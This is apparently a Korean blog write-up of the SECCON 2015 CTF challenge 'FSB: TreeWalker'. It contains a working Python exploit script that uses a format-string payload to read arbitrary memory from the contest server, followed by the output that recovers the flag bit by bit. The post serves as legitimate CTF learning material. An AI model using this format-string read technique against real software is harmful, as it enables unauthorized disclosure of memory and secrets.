티스토리 뷰
워낙 재미있게 풀었던 문제! 설명은 아래 IDA Hexray로 대신함 (head tree의 주소는 친절하게 출력해줌)
분석자체는 쉬웠는데, 예선당시에는 성우형이 대신 짜주셔서 옆에서 구경했다.
그래서 다시 플래그 구할 때 FSB때문에 조금 시간이 걸려 버렸다.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Seccon 2015 Quals - Exploit FSB:TreeWalker 200pts Solves:51 | |
# github.com/SECCON/SECCON2015_online_CTF/tree/master/Exploit/200_FSB:%20TreeWalker | |
# FSB Leak task :) | |
from err0rless import connst | |
from struct import pack, unpack | |
s, t = connst("treewalker.pwn.seccon.jp", 20000) | |
def leak(addr): | |
p = "%p" * 20 # p = "%llx" * 30 | |
p += "%s" | |
p += "mmark\x00" | |
p += pack("Q", addr) | |
p += '\x00' * (0x512 - len(p)) | |
s.send(pack("q", 0x512)) | |
s.send(p) | |
return s.recv(1024)[-9:-5] | |
def main(): | |
tree = int(s.recv(1024), 16) | |
print "TREE : " + hex(tree) | |
if tree < 0x01000000: return 0 | |
byte = "" | |
flag = "" | |
while byte != "}": | |
byte = "" | |
for i in range(8): | |
buf = unpack("I", leak(tree + 8))[0] | |
if buf == (tree + 0x20): | |
byte += '1' | |
print '1', | |
else: | |
byte += '0' | |
print '0', | |
tree = tree + 0x20 | |
byte = chr(int(byte, 2)) | |
flag += byte | |
print byte | |
print flag | |
if __name__ == "__main__": | |
main() | |
""" | |
TREE : 0x174d010 | |
0 1 0 1 0 0 1 1 S | |
0 1 0 0 0 1 0 1 E | |
0 1 0 0 0 0 1 1 C | |
0 1 0 0 0 0 1 1 C | |
0 1 0 0 1 1 1 1 O | |
0 1 0 0 1 1 1 0 N | |
0 1 1 1 1 0 1 1 { | |
0 0 1 1 0 1 0 0 4 | |
0 1 1 1 0 0 1 0 r | |
0 1 1 0 0 0 1 0 b | |
0 0 1 1 0 0 0 1 1 | |
0 0 1 1 0 1 1 1 7 | |
0 1 0 1 0 0 1 0 R | |
0 1 0 0 0 0 0 0 @ | |
0 1 1 1 0 0 1 0 r | |
0 1 0 1 1 0 0 1 Y | |
0 1 0 1 0 0 1 0 R | |
0 1 1 0 0 1 0 1 e | |
0 1 0 0 0 0 0 1 A | |
0 1 1 0 0 1 0 0 d | |
0 1 1 1 1 1 0 1 } | |
SECCON{4rb17R@rYReAd} | |
[Finished in 28.0s] | |
""" |
'Pwnable > CTF' 카테고리의 다른 글
32c3 CTF 2015 teufel (3) | 2015.12.31 |
---|---|
32c3 CTF readme (0) | 2015.12.30 |
Plaid CTF 2014 pork (0) | 2015.10.25 |
Layer7 CTF 2015 Spil..Spli....SPPPPPIILL (0) | 2015.09.16 |
Codegate 2015 Bookstore (0) | 2015.09.14 |